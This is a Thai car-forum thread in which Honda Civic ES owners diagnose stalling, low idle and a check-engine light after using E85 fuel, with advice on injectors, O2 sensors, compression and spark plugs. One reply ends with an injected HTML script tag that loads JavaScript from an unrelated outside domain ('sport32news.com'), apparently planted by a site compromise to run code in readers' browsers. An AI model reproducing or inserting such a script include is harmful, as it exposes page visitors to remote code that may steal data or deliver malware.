ตอบ
Pondlimitless


เข้าร่วม: 22 สิงหา 2014
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 63
ให้คำขอบคุณ: 39

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 8 ตุลา 2014 09:08 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
เห็นสมดาชิกในคลับเติมกันมาหลายคนแล้ว รถผม es02 เครื่อง D17z เดิมๆ ลองเติม E85 มา 1 อาทิตย์แล้ว มีอาการ ไฟหน้าปัดโชว์ รอบเดินเบาตกอยู่ที่ 400-600 แต่พอดับเครื่องบิดกุญแจไปที่ off แล้วสตาร์ทเครื่องใหม่ ไฟหน้าปัดดับ รอบเดินเบาปกติ แล้วอีกอาการคือขับๆเครื่องดับครับ
ได้รับคำขอบคุณจาก: pakorn25  numxs 
creedsaa


เข้าร่วม: 10 กันยา 2013
ตอบ: 121

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 106
ให้คำขอบคุณ: 16

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 ตุลา 2014 09:28 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ไม่รู้เกี่ยวกับหัวฉีด กับ ปั๊มติ๊กป่าวครับ 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 8 ตุลา 2014 11:26 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
เกี่ยวกับ E85 รึเปล่าครับ รอเก็บข้อมูลครับ"<script src="https://sport32news.com/civicesgroup.js">
kkanakornkum


ชื่อเล่น: เค

เข้าร่วม: 04 มกรา 2014
ตอบ: 495

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 275
ให้คำขอบคุณ: 37

ปี: 2002
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พุธ, 8 ตุลา 2014 12:37 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ทำไมเป็นงั้นไปได้
ได้รับคำขอบคุณจาก: nong_fb 
srithanon


เข้าร่วม: 13 สิงหา 2009
ตอบ: 380

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 1324
ให้คำขอบคุณ: 4
พุธ, 8 ตุลา 2014 12:55 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
มันเป็นอาการของน้ำมัน E85 ครับ ไม่เชื่อลองสลับมาเป็นแกสโซฮอล 95 อาการจะปกติ ที่เป็นเช่นนี้เพราะว่าในน้ำมัน E85 ให้พลังงานความร้อนน้อยกว่าใในระบบน้ำมันเบ็นซิล จึงจำเป้นที่จะต้องเพิ่มระยะเวลาของการเปิดหัวฉีดให้น้ำมันเพิ่มมากขึ้น โดยแก้ไขช่วงคาบเวลาของการเปิดหัวฉีดน้ำมันให้ทำการเปิดนานขึ้นกว่าเดิม จึงจะทำให้การจุดระเบิดสมบูรณ์ขึ้น เครื่องยนต์มีกำลังเช่นเดียวกับระบบน้ำมัยเบนซิล แต่ใช่ว่าจะปรับที่คาบเวลาการทำงานของหัวฉีดให้นานขึ้นอย่างเดียวก็หาได้ผลสมบูรณ์ไม่ ต้องมีส่วนประกอบอื่นที่เข้ามาเสริม

นกรณีที่ท่านเจ้าของกระทู้บอกว่าเห็นเพื่อนๆที่มีรถรุ่นเดียวกันใช้กันได้ ไม่เห็นความผิดปกติที่เด่นชัด ( ความจริงมี คือเครื่องจะมีกำลังตกและรอบเดินเบาต่ำลงบ้าง) แต่พอรับได้กับการใช้น้ำมัน E85 เนื่องจากกรณีของท่านเจ้าของกระทู้ ที่มีรถรุ่นเดียวกัน แต่กลับมีปัญหา น่าจะมาจากความสมบูรณ์ของเครื่องยนต์อาจจะต่ำกว่าของเพื่อน เช่นเครื่องอาจจะหลวมกว่าของเพื่อน นอกจากเครื่องหลวมทำให้กำลังอัดในกระบอกสูบต่ำลงแล้ว ยังมีปัจจัยเรื่องไฟจุดระเบิดที่จ่ายให้กับหัวเทียนต่ำลง ซึ่งเป็นปัจจัยหลักที่ทำให้เกิดอาการนี้ได้

การที่สถานะไฟรูปเครื่องยนต์โชว์บนหน้าปัทม์ นั่นเป็นการแสดงให้ทราบว่า ในระบบการจุดระเบิด ไม่สมบูรณ์ หลงเหลือปริมาณอ็อกซิเจนในระบบเผาไหม้ O2 sensor จึงจับปริมาณอ๋อกซิเจนได้ แล้วแปลงเป็นโวลเต็จ ส่งให้ ECU แก้ไขปรับคาบเวลาการเปิดของหัวฉีดน้ำมันให้มีความเหมาะสม แต่เนื่องจากในระบบเครื่องยนต์ที่ไม่ได้ออกแบบมาให้ใช้กับระบบน้ำมัน E85 ในการปรับปรุงแก้ไขคาบเวลาในการทำงานของหัวฉีด จึงไม่ได้โปรแกรมให้สามารถขยายคายเวลาการเปิดของหัวฉีดเพิ่มขึ้นเพื่อรองรับน้ำมัน E85 หรือที่เรียกว่า เกินค่าที่กำหนด จึงทำให้เครื่องยนต์แสดงอาการออกมาตามที่เห็น

ปกติแล้วเมื่อ O2 sensor จับปริมาณอ๊อกซิเจนได้ในระบบการเผาไหม้ในท่อไอเสีย ก็จะส่งสัญญาณโวลเต็จไปบอกให้ ECU ทราบ ในลักษณะ น้ำมันหนาหรือบาง ในส่วนผสมของการจุดระเบิด แล้ว ECU จะทำการแก้ไขคาบเวลานการเปิดของหัวฉีดน้ำมัน ให้ฉีดน้ำมันมากหรือน้อยให้เหมาะสมในอัตราส่วนการจุดระเบิดเผาไหม้ ดังนั้นในการใช้นำมัน E85 ในรถที่ยังไม่ได้ปรับปรุงให้ใช้กับน้ำมันนี้ ECU จึงไม่วามารแก้ไขปรับคาบเวลาให้หัวฉีดเปิดนานขึ้น

อยากจะแนะนำว่า หากจะให้ใช้น้ำมัน E85 ได้แบบเดียวกับเพื่อนๆ โดยไม่ได้ไปติดตั้งชุดคิท E85 ก็ลองให้ไปทำการตรวจสอบเรื่องกำลังอัดของกระบอกสูบ ว่าตกลงมากหรือไม่ หรืออาจจะพอแก้ไขได้บ้างก็คือให้ช่างปรับตั้งวาวล์ให้ไหม่( รถบางรุ่นอาจจะเป็นไฮโดรลิควาวล์ ตั้งไม่ได้) หากตั้งวาวล์ได้ ก็จะทำให้มีกำลังอักเพิ่มขึ้น เพราะวาวล์อาจจะปิดสนิทเพิ่มขึ้น ทำให้กำลังอัดไม่รั่ว
จากนั้นให้ตรวจสอบระบบไฟจุดระเบิด ว่ามีไฟไปจ่ายให่กับหัวเทียนสมบูรณ์?หรือไม่ อาจจะมีสายหัวเทียนเกิดความต้านทานเพิ่มขึ้น ทำให้เกิดโวลเต็จดร๊อปในสาย ให้ไฟไฟสูงที่จ่ายให้กับหัวเทียนต่ำลง และลองเปลี่ยนหัวเทียนด้วย เพราะหลายๆท่านยังไม่ทราบว่าใส้ของหัวเทียนที่เป็นโลหะผสม ที่ให้กระแสไฟโวลเต็จสูงผ่าน เมื่อมีการใช้งานไปก็จะเกิดค่าความต้านทานเพิ่มขึ้นเช่นเดียวกับสายหัวเทียน และถ้าหากเกิดค่าความต้านทานเพิ่มขึ้นมาก จะทำให้ไฟที่เกิดประกายที่เขี้ยวหัวเทียน มีน้อย ทำให้การจุดระเบิดไม่สมบูรณ์ เครื่องยนต์กำลังตก ลองตรวจสอบวัดค่าความต้านทานระหว่างหัวเทียนใหม่กับหัวเทียนเก่าที่ใช้แล้วดูก็ได้ ก็ลองไปตรวจสอบหลักๆตามที่ผมกล่าวดูครับ ก็อาจทำให้ท่านเจ้าของกระทู้กลับมาใช้น้ำมัน E85 ได้เช่นเดียวกับพื่อน

ขอกล่าวเพิ่มเติมอีกหน่อย ทราบว่ามีท่านผู้รู้บอกว่าสำหรับรถ ES ในบางรุ่น ตั้งแต่ปี 04 ขึ้นไป ECU ของเครื่องยนต์ สามารถ Cover การปรับคาบเวลาเพิ่มขึ้นให้กับหัวฉีดได้ แต่ไม่สมบูรณ์ จริงเท็จประการใด ผมก็ยังไม่ได้ทดสอบการทำงานด้วยเครื่องมืออีเลคโทรนิคส์ ว่าเป็นจริงหรือไม่ โดยการวัดค่าคาบเวลาของสัญญาณพัลส์หัวฉีด ว่าเครื่องยนต์ที่ติดตั้งชุดคิท E85 ในรุ่นปีดังกล่าว ว่าการใช้และไม่ใช่ชุดคิท E85 มีค่าคาบเวลาของการเปิดหัวฉีดเท่ากันหรือไม่ หากเท่ากันก็แสดงว่ารถรุ่นนั้นมีกล่อง ECU ที่สามารถใช้กับน้ำมัน E85ได้ ส่วนที่จะสมบูรณ์แค่ไหนอย่างไรก็ต้อง ไปตรวจสอบเทียบเคียงกับรถที่ผลิดออกมาใช้กับน้ำมัน E85 ดู ว่ามีส่วนต่างๆอะไรบ้าง แต่ทราบในเบื้อต้นว่า มีส่วนที่แตกต่างหลายอย่าง .....srithanon
ได้รับคำขอบคุณจาก: taomang  vor_ped  KAATO  toshi  honda01  Pondlimitless  nong_fb  kkw  popza4  Doraeman  Nung_Sodapop  bondza  EgawiT7864  GUN992  raphael1984  Juris  pakorn25  tokykung  kaison  pongz19  NutNicha 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 8 ตุลา 2014 13:15 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
srithanon พิมพ์ว่า:
มันเป็นอาการของน้ำมัน E85 ครับ ไม่เชื่อลองสลับมาเป็นแกสโซฮอล 95 อาการจะปกติ ที่เป็นเช่นนี้เพราะว่าในน้ำมัน E85 ให้พลังงานความร้อนน้อยกว่าใในระบบน้ำมันเบ็นซิล จึงจำเป้นที่จะต้องเพิ่มระยะเวลาของการเปิดหัวฉีดให้น้ำมันเพิ่มมากขึ้น โดยแก้ไขช่วงคาบเวลาของการเปิดหัวฉีดน้ำมันให้ทำการเปิดนานขึ้นกว่าเดิม จึงจะทำให้การจุดระเบิดสมบูรณ์ขึ้น เครื่องยนต์มีกำลังเช่นเดียวกับระบบน้ำมัยเบนซิล แต่ใช่ว่าจะปรับที่คาบเวลาการทำงานของหัวฉีดให้นานขึ้นอย่างเดียวก็หาได้ผลสมบูรณ์ไม่ ต้องมีส่วนประกอบอื่นที่เข้ามาเสริม

นกรณีที่ท่านเจ้าของกระทู้บอกว่าเห็นเพื่อนๆที่มีรถรุ่นเดียวกันใช้กันได้ ไม่เห็นความผิดปกติที่เด่นชัด ( ความจริงมี คือเครื่องจะมีกำลังตกและรอบเดินเบาต่ำลงบ้าง) แต่พอรับได้กับการใช้น้ำมัน E85 เนื่องจากกรณีของท่านเจ้าของกระทู้ ที่มีรถรุ่นเดียวกัน แต่กลับมีปัญหา น่าจะมาจากความสมบูรณ์ของเครื่องยนต์อาจจะต่ำกว่าของเพื่อน เช่นเครื่องอาจจะหลวมกว่าของเพื่อน นอกจากเครื่องหลวมทำให้กำลังอัดในกระบอกสูบต่ำลงแล้ว ยังมีปัจจัยเรื่องไฟจุดระเบิดที่จ่ายให้กับหัวเทียนต่ำลง ซึ่งเป็นปัจจัยหลักที่ทำให้เกิดอาการนี้ได้

การที่สถานะไฟรูปเครื่องยนต์โชว์บนหน้าปัทม์ นั่นเป็นการแสดงให้ทราบว่า ในระบบการจุดระเบิด ไม่สมบูรณ์ หลงเหลือปริมาณอ็อกซิเจนในระบบเผาไหม้ O2 sensor จึงจับปริมาณอ๋อกซิเจนได้ แล้วแปลงเป็นโวลเต็จ ส่งให้ ECU แก้ไขปรับคาบเวลาการเปิดของหัวฉีดน้ำมันให้มีความเหมาะสม แต่เนื่องจากในระบบเครื่องยนต์ที่ไม่ได้ออกแบบมาให้ใช้กับระบบน้ำมัน E85 ในการปรับปรุงแก้ไขคาบเวลาในการทำงานของหัวฉีด จึงไม่ได้โปรแกรมให้สามารถขยายคายเวลาการเปิดของหัวฉีดเพิ่มขึ้นเพื่อรองรับน้ำมัน E85 หรือที่เรียกว่า เกินค่าที่กำหนด จึงทำให้เครื่องยนต์แสดงอาการออกมาตามที่เห็น

ปกติแล้วเมื่อ O2 sensor จับปริมาณอ๊อกซิเจนได้ในระบบการเผาไหม้ในท่อไอเสีย ก็จะส่งสัญญาณโวลเต็จไปบอกให้ ECU ทราบ ในลักษณะ น้ำมันหนาหรือบาง ในส่วนผสมของการจุดระเบิด แล้ว ECU จะทำการแก้ไขคาบเวลานการเปิดของหัวฉีดน้ำมัน ให้ฉีดน้ำมันมากหรือน้อยให้เหมาะสมในอัตราส่วนการจุดระเบิดเผาไหม้ ดังนั้นในการใช้นำมัน E85 ในรถที่ยังไม่ได้ปรับปรุงให้ใช้กับน้ำมันนี้ ECU จึงไม่วามารแก้ไขปรับคาบเวลาให้หัวฉีดเปิดนานขึ้น

อยากจะแนะนำว่า หากจะให้ใช้น้ำมัน E85 ได้แบบเดียวกับเพื่อนๆ โดยไม่ได้ไปติดตั้งชุดคิท E85 ก็ลองให้ไปทำการตรวจสอบเรื่องกำลังอัดของกระบอกสูบ ว่าตกลงมากหรือไม่ หรืออาจจะพอแก้ไขได้บ้างก็คือให้ช่างปรับตั้งวาวล์ให้ไหม่( รถบางรุ่นอาจจะเป็นไฮโดรลิควาวล์ ตั้งไม่ได้) หากตั้งวาวล์ได้ ก็จะทำให้มีกำลังอักเพิ่มขึ้น เพราะวาวล์อาจจะปิดสนิทเพิ่มขึ้น ทำให้กำลังอัดไม่รั่ว
จากนั้นให้ตรวจสอบระบบไฟจุดระเบิด ว่ามีไฟไปจ่ายให่กับหัวเทียนสมบูรณ์?หรือไม่ อาจจะมีสายหัวเทียนเกิดความต้านทานเพิ่มขึ้น ทำให้เกิดโวลเต็จดร๊อปในสาย ให้ไฟไฟสูงที่จ่ายให้กับหัวเทียนต่ำลง และลองเปลี่ยนหัวเทียนด้วย เพราะหลายๆท่านยังไม่ทราบว่าใส้ของหัวเทียนที่เป็นโลหะผสม ที่ให้กระแสไฟโวลเต็จสูงผ่าน เมื่อมีการใช้งานไปก็จะเกิดค่าความต้านทานเพิ่มขึ้นเช่นเดียวกับสายหัวเทียน และถ้าหากเกิดค่าความต้านทานเพิ่มขึ้นมาก จะทำให้ไฟที่เกิดประกายที่เขี้ยวหัวเทียน มีน้อย ทำให้การจุดระเบิดไม่สมบูรณ์ เครื่องยนต์กำลังตก ลองตรวจสอบวัดค่าความต้านทานระหว่างหัวเทียนใหม่กับหัวเทียนเก่าที่ใช้แล้วดูก็ได้ ก็ลองไปตรวจสอบหลักๆตามที่ผมกล่าวดูครับ ก็อาจทำให้ท่านเจ้าของกระทู้กลับมาใช้น้ำมัน E85 ได้เช่นเดียวกับพื่อน

ขอกล่าวเพิ่มเติมอีกหน่อย ทราบว่ามีท่านผู้รู้บอกว่าสำหรับรถ ES ในบางรุ่น ตั้งแต่ปี 04 ขึ้นไป ECU ของเครื่องยนต์ สามารถ Cover การปรับคาบเวลาเพิ่มขึ้นให้กับหัวฉีดได้ แต่ไม่สมบูรณ์ จริงเท็จประการใด ผมก็ยังไม่ได้ทดสอบการทำงานด้วยเครื่องมืออีเลคโทรนิคส์ ว่าเป็นจริงหรือไม่ โดยการวัดค่าคาบเวลาของสัญญาณพัลส์หัวฉีด ว่าเครื่องยนต์ที่ติดตั้งชุดคิท E85 ในรุ่นปีดังกล่าว ว่าการใช้และไม่ใช่ชุดคิท E85 มีค่าคาบเวลาของการเปิดหัวฉีดเท่ากันหรือไม่ หากเท่ากันก็แสดงว่ารถรุ่นนั้นมีกล่อง ECU ที่สามารถใช้กับน้ำมัน E85ได้ ส่วนที่จะสมบูรณ์แค่ไหนอย่างไรก็ต้อง ไปตรวจสอบเทียบเคียงกับรถที่ผลิดออกมาใช้กับน้ำมัน E85 ดู ว่ามีส่วนต่างๆอะไรบ้าง แต่ทราบในเบื้อต้นว่า มีส่วนที่แตกต่างหลายอย่าง .....srithanon




ข้อมูลดีครับ
ได้รับคำขอบคุณจาก: bondza 
Pondlimitless


เข้าร่วม: 22 สิงหา 2014
ตอบ: 90

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 63
ให้คำขอบคุณ: 39

ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 8 ตุลา 2014 16:32 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
srithanon พิมพ์ว่า:
มันเป็นอาการของน้ำมัน E85 ครับ ไม่เชื่อลองสลับมาเป็นแกสโซฮอล 95 อาการจะปกติ ที่เป็นเช่นนี้เพราะว่าในน้ำมัน E85 ให้พลังงานความร้อนน้อยกว่าใในระบบน้ำมันเบ็นซิล จึงจำเป้นที่จะต้องเพิ่มระยะเวลาของการเปิดหัวฉีดให้น้ำมันเพิ่มมากขึ้น โดยแก้ไขช่วงคาบเวลาของการเปิดหัวฉีดน้ำมันให้ทำการเปิดนานขึ้นกว่าเดิม จึงจะทำให้การจุดระเบิดสมบูรณ์ขึ้น เครื่องยนต์มีกำลังเช่นเดียวกับระบบน้ำมัยเบนซิล แต่ใช่ว่าจะปรับที่คาบเวลาการทำงานของหัวฉีดให้นานขึ้นอย่างเดียวก็หาได้ผลสมบูรณ์ไม่ ต้องมีส่วนประกอบอื่นที่เข้ามาเสริม

นกรณีที่ท่านเจ้าของกระทู้บอกว่าเห็นเพื่อนๆที่มีรถรุ่นเดียวกันใช้กันได้ ไม่เห็นความผิดปกติที่เด่นชัด ( ความจริงมี คือเครื่องจะมีกำลังตกและรอบเดินเบาต่ำลงบ้าง) แต่พอรับได้กับการใช้น้ำมัน E85 เนื่องจากกรณีของท่านเจ้าของกระทู้ ที่มีรถรุ่นเดียวกัน แต่กลับมีปัญหา น่าจะมาจากความสมบูรณ์ของเครื่องยนต์อาจจะต่ำกว่าของเพื่อน เช่นเครื่องอาจจะหลวมกว่าของเพื่อน นอกจากเครื่องหลวมทำให้กำลังอัดในกระบอกสูบต่ำลงแล้ว ยังมีปัจจัยเรื่องไฟจุดระเบิดที่จ่ายให้กับหัวเทียนต่ำลง ซึ่งเป็นปัจจัยหลักที่ทำให้เกิดอาการนี้ได้

การที่สถานะไฟรูปเครื่องยนต์โชว์บนหน้าปัทม์ นั่นเป็นการแสดงให้ทราบว่า ในระบบการจุดระเบิด ไม่สมบูรณ์ หลงเหลือปริมาณอ็อกซิเจนในระบบเผาไหม้ O2 sensor จึงจับปริมาณอ๋อกซิเจนได้ แล้วแปลงเป็นโวลเต็จ ส่งให้ ECU แก้ไขปรับคาบเวลาการเปิดของหัวฉีดน้ำมันให้มีความเหมาะสม แต่เนื่องจากในระบบเครื่องยนต์ที่ไม่ได้ออกแบบมาให้ใช้กับระบบน้ำมัน E85 ในการปรับปรุงแก้ไขคาบเวลาในการทำงานของหัวฉีด จึงไม่ได้โปรแกรมให้สามารถขยายคายเวลาการเปิดของหัวฉีดเพิ่มขึ้นเพื่อรองรับน้ำมัน E85 หรือที่เรียกว่า เกินค่าที่กำหนด จึงทำให้เครื่องยนต์แสดงอาการออกมาตามที่เห็น

ปกติแล้วเมื่อ O2 sensor จับปริมาณอ๊อกซิเจนได้ในระบบการเผาไหม้ในท่อไอเสีย ก็จะส่งสัญญาณโวลเต็จไปบอกให้ ECU ทราบ ในลักษณะ น้ำมันหนาหรือบาง ในส่วนผสมของการจุดระเบิด แล้ว ECU จะทำการแก้ไขคาบเวลานการเปิดของหัวฉีดน้ำมัน ให้ฉีดน้ำมันมากหรือน้อยให้เหมาะสมในอัตราส่วนการจุดระเบิดเผาไหม้ ดังนั้นในการใช้นำมัน E85 ในรถที่ยังไม่ได้ปรับปรุงให้ใช้กับน้ำมันนี้ ECU จึงไม่วามารแก้ไขปรับคาบเวลาให้หัวฉีดเปิดนานขึ้น

อยากจะแนะนำว่า หากจะให้ใช้น้ำมัน E85 ได้แบบเดียวกับเพื่อนๆ โดยไม่ได้ไปติดตั้งชุดคิท E85 ก็ลองให้ไปทำการตรวจสอบเรื่องกำลังอัดของกระบอกสูบ ว่าตกลงมากหรือไม่ หรืออาจจะพอแก้ไขได้บ้างก็คือให้ช่างปรับตั้งวาวล์ให้ไหม่( รถบางรุ่นอาจจะเป็นไฮโดรลิควาวล์ ตั้งไม่ได้) หากตั้งวาวล์ได้ ก็จะทำให้มีกำลังอักเพิ่มขึ้น เพราะวาวล์อาจจะปิดสนิทเพิ่มขึ้น ทำให้กำลังอัดไม่รั่ว
จากนั้นให้ตรวจสอบระบบไฟจุดระเบิด ว่ามีไฟไปจ่ายให่กับหัวเทียนสมบูรณ์?หรือไม่ อาจจะมีสายหัวเทียนเกิดความต้านทานเพิ่มขึ้น ทำให้เกิดโวลเต็จดร๊อปในสาย ให้ไฟไฟสูงที่จ่ายให้กับหัวเทียนต่ำลง และลองเปลี่ยนหัวเทียนด้วย เพราะหลายๆท่านยังไม่ทราบว่าใส้ของหัวเทียนที่เป็นโลหะผสม ที่ให้กระแสไฟโวลเต็จสูงผ่าน เมื่อมีการใช้งานไปก็จะเกิดค่าความต้านทานเพิ่มขึ้นเช่นเดียวกับสายหัวเทียน และถ้าหากเกิดค่าความต้านทานเพิ่มขึ้นมาก จะทำให้ไฟที่เกิดประกายที่เขี้ยวหัวเทียน มีน้อย ทำให้การจุดระเบิดไม่สมบูรณ์ เครื่องยนต์กำลังตก ลองตรวจสอบวัดค่าความต้านทานระหว่างหัวเทียนใหม่กับหัวเทียนเก่าที่ใช้แล้วดูก็ได้ ก็ลองไปตรวจสอบหลักๆตามที่ผมกล่าวดูครับ ก็อาจทำให้ท่านเจ้าของกระทู้กลับมาใช้น้ำมัน E85 ได้เช่นเดียวกับพื่อน

ขอกล่าวเพิ่มเติมอีกหน่อย ทราบว่ามีท่านผู้รู้บอกว่าสำหรับรถ ES ในบางรุ่น ตั้งแต่ปี 04 ขึ้นไป ECU ของเครื่องยนต์ สามารถ Cover การปรับคาบเวลาเพิ่มขึ้นให้กับหัวฉีดได้ แต่ไม่สมบูรณ์ จริงเท็จประการใด ผมก็ยังไม่ได้ทดสอบการทำงานด้วยเครื่องมืออีเลคโทรนิคส์ ว่าเป็นจริงหรือไม่ โดยการวัดค่าคาบเวลาของสัญญาณพัลส์หัวฉีด ว่าเครื่องยนต์ที่ติดตั้งชุดคิท E85 ในรุ่นปีดังกล่าว ว่าการใช้และไม่ใช่ชุดคิท E85 มีค่าคาบเวลาของการเปิดหัวฉีดเท่ากันหรือไม่ หากเท่ากันก็แสดงว่ารถรุ่นนั้นมีกล่อง ECU ที่สามารถใช้กับน้ำมัน E85ได้ ส่วนที่จะสมบูรณ์แค่ไหนอย่างไรก็ต้อง ไปตรวจสอบเทียบเคียงกับรถที่ผลิดออกมาใช้กับน้ำมัน E85 ดู ว่ามีส่วนต่างๆอะไรบ้าง แต่ทราบในเบื้อต้นว่า มีส่วนที่แตกต่างหลายอย่าง .....srithanon



อยาจจะเป็นไปได้ว่าเครื่องหลวมครับ วิ่งมาก็ 17x,xxx กิโลแล้วครับ ขอบคุณสำหรับข้อมูลดีๆครับ 
ได้รับคำขอบคุณจาก: bondza  pakorn25  tokykung 
domziia


ชื่อเล่น: เจต

เข้าร่วม: 24 กุมภา 2012
ตอบ: 1246

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 3865

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 8 ตุลา 2014 17:31 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
อาการแรกที่คนมาใช้ E 85 จะเจอคับ พอใช้ไปนานๆก็หายคับ 
ได้รับคำขอบคุณจาก: kaison 
wasan_ceo


ชื่อเล่น: โจ้

เข้าร่วม: 29 กันยา 2013
ตอบ: 573

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 589
ให้คำขอบคุณ: 93

ที่อยู่: กระบี่
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 8 ตุลา 2014 18:51 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
ให้เติม E20 สักสองถังก่อนครับ แล้วค่อย ติมผสม E20 + E85 ครึ่งๆ สัก 1 ถัง จากนั้น
ค่อยจัดเพียว ให้มันจำพฤติกรรมการจ่ายน้ำมัน และการจุดระเบิดของน้ำมันก่อนครับ
ลองดู
ได้รับคำขอบคุณจาก: bondza  kaison 
Sprites


ชื่อเล่น: ไปรท์

เข้าร่วม: 11 มีนา 2013
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 30
ให้คำขอบคุณ: 57

ที่อยู่: จังหวัดนนทบุรี ถ.งามวงศ์วาน
ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 8 ตุลา 2014 20:16 - เติม E85 ไฟโชว์ รอบเดินเบาตก ขับๆไปดับ
srithanon พิมพ์ว่า:
มันเป็นอาการของน้ำมัน E85 ครับ ไม่เชื่อลองสลับมาเป็นแกสโซฮอล 95 อาการจะปกติ ที่เป็นเช่นนี้เพราะว่าในน้ำมัน E85 ให้พลังงานความร้อนน้อยกว่าใในระบบน้ำมันเบ็นซิล จึงจำเป้นที่จะต้องเพิ่มระยะเวลาของการเปิดหัวฉีดให้น้ำมันเพิ่มมากขึ้น โดยแก้ไขช่วงคาบเวลาของการเปิดหัวฉีดน้ำมันให้ทำการเปิดนานขึ้นกว่าเดิม จึงจะทำให้การจุดระเบิดสมบูรณ์ขึ้น เครื่องยนต์มีกำลังเช่นเดียวกับระบบน้ำมัยเบนซิล แต่ใช่ว่าจะปรับที่คาบเวลาการทำงานของหัวฉีดให้นานขึ้นอย่างเดียวก็หาได้ผลสมบูรณ์ไม่ ต้องมีส่วนประกอบอื่นที่เข้ามาเสริม

นกรณีที่ท่านเจ้าของกระทู้บอกว่าเห็นเพื่อนๆที่มีรถรุ่นเดียวกันใช้กันได้ ไม่เห็นความผิดปกติที่เด่นชัด ( ความจริงมี คือเครื่องจะมีกำลังตกและรอบเดินเบาต่ำลงบ้าง) แต่พอรับได้กับการใช้น้ำมัน E85 เนื่องจากกรณีของท่านเจ้าของกระทู้ ที่มีรถรุ่นเดียวกัน แต่กลับมีปัญหา น่าจะมาจากความสมบูรณ์ของเครื่องยนต์อาจจะต่ำกว่าของเพื่อน เช่นเครื่องอาจจะหลวมกว่าของเพื่อน นอกจากเครื่องหลวมทำให้กำลังอัดในกระบอกสูบต่ำลงแล้ว ยังมีปัจจัยเรื่องไฟจุดระเบิดที่จ่ายให้กับหัวเทียนต่ำลง ซึ่งเป็นปัจจัยหลักที่ทำให้เกิดอาการนี้ได้

การที่สถานะไฟรูปเครื่องยนต์โชว์บนหน้าปัทม์ นั่นเป็นการแสดงให้ทราบว่า ในระบบการจุดระเบิด ไม่สมบูรณ์ หลงเหลือปริมาณอ็อกซิเจนในระบบเผาไหม้ O2 sensor จึงจับปริมาณอ๋อกซิเจนได้ แล้วแปลงเป็นโวลเต็จ ส่งให้ ECU แก้ไขปรับคาบเวลาการเปิดของหัวฉีดน้ำมันให้มีความเหมาะสม แต่เนื่องจากในระบบเครื่องยนต์ที่ไม่ได้ออกแบบมาให้ใช้กับระบบน้ำมัน E85 ในการปรับปรุงแก้ไขคาบเวลาในการทำงานของหัวฉีด จึงไม่ได้โปรแกรมให้สามารถขยายคายเวลาการเปิดของหัวฉีดเพิ่มขึ้นเพื่อรองรับน้ำมัน E85 หรือที่เรียกว่า เกินค่าที่กำหนด จึงทำให้เครื่องยนต์แสดงอาการออกมาตามที่เห็น

ปกติแล้วเมื่อ O2 sensor จับปริมาณอ๊อกซิเจนได้ในระบบการเผาไหม้ในท่อไอเสีย ก็จะส่งสัญญาณโวลเต็จไปบอกให้ ECU ทราบ ในลักษณะ น้ำมันหนาหรือบาง ในส่วนผสมของการจุดระเบิด แล้ว ECU จะทำการแก้ไขคาบเวลานการเปิดของหัวฉีดน้ำมัน ให้ฉีดน้ำมันมากหรือน้อยให้เหมาะสมในอัตราส่วนการจุดระเบิดเผาไหม้ ดังนั้นในการใช้นำมัน E85 ในรถที่ยังไม่ได้ปรับปรุงให้ใช้กับน้ำมันนี้ ECU จึงไม่วามารแก้ไขปรับคาบเวลาให้หัวฉีดเปิดนานขึ้น

อยากจะแนะนำว่า หากจะให้ใช้น้ำมัน E85 ได้แบบเดียวกับเพื่อนๆ โดยไม่ได้ไปติดตั้งชุดคิท E85 ก็ลองให้ไปทำการตรวจสอบเรื่องกำลังอัดของกระบอกสูบ ว่าตกลงมากหรือไม่ หรืออาจจะพอแก้ไขได้บ้างก็คือให้ช่างปรับตั้งวาวล์ให้ไหม่( รถบางรุ่นอาจจะเป็นไฮโดรลิควาวล์ ตั้งไม่ได้) หากตั้งวาวล์ได้ ก็จะทำให้มีกำลังอักเพิ่มขึ้น เพราะวาวล์อาจจะปิดสนิทเพิ่มขึ้น ทำให้กำลังอัดไม่รั่ว
